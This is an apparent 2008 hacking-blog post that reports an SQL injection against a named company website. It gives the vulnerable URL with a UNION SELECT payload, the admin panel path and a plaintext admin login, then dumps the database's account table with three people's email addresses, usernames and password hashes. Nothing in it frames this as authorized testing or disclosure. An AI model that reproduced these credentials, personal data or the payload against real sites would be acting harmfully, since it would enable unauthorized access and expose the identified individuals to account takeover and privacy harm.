viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Thursday, October 9, 2008

[SQLi] http://www.gajahmada.co.id

11:51 PM Posted by viperfx07 No comments

Tool --> schemafuzz.py v5.0
Admin dir --> http://www.gajahmada.co.id/admin
Admin usr:pwd --> agung:agung
Dump: [+] URL:http://www.gajahmada.co.id/home.php?id=front&cat=28+AND+1=2+UNION+SELECT+darkc0de--
[+] Evasion Used: "+" "--"
[+] 18:17:17
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: gajahmd_dbgajahmada
User: gajahmd_webgama@localhost
Version: 4.1.22-standard
[+] Dumping data from database "gajahmd_dbgajahmada" Table "account"
[+] Column(s) ['email', 'password', 'username']
[+] Number of Rows: 3

[0] agung@mail.com:e59cd3ce33a68f536c19fedb82a7936f:agung:
[1] widodo@dmtech.web.id:d7f51cb5be62883c3570409bba87bc64:Widodo:
[2] rnsutoto@danamon.co.id:0d60d9bad139980ded0c82800be93bba:Sutoto_Rn:Sutoto_Rn:

[-] [18:17:18]
[-] Total URL Requests 5
[-] Done

0 comments:

Post a Comment